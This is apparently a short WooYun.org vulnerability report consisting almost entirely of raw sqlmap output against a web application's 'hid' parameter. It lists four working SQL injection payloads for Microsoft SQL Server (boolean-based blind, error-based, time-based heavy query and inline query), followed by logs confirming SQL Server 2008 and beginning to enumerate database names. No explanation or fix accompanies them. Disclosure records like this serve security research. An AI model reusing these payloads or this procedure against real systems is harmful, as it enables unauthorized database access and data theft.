WooYun.org

sqlmap identified the following injection points with a total of 48 HTTP(s) requ
ests:
---
Place: GET
Parameter: hid
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (
original value)
    Payload: hid=(SELECT (CASE WHEN (4885=4885) THEN 88952634 ELSE 4885*(SELECT
4885 FROM master..sysdatabases) END))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2
=2015-3-10
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: hid=-9548 OR 3123=CONVERT(INT,(CHAR(58) CHAR(120) CHAR(122) CHAR(12
0) CHAR(58) (SELECT (CASE WHEN (3123=3123) THEN CHAR(49) ELSE CHAR(48) END)) CHA
R(58) CHAR(108) CHAR(111) CHAR(100) CHAR(58)))&rid=88952634&pid=88952634&tm1=201
5-3-8&tm2=2015-3-10
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: hid=-3737 OR 2638=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers A
S sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysus
ers AS sys7)&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: hid=(SELECT CHAR(58) CHAR(120) CHAR(122) CHAR(120) CHAR(58) (SELECT
 (CASE WHEN (4578=4578) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(108) CHA
R(111) CHAR(100) CHAR(58))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10
---
[19:36:04] [INFO] testing Microsoft SQL Server
[19:36:04] [INFO] confirming Microsoft SQL Server
[19:36:05] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
[19:36:05] [INFO] fetching database names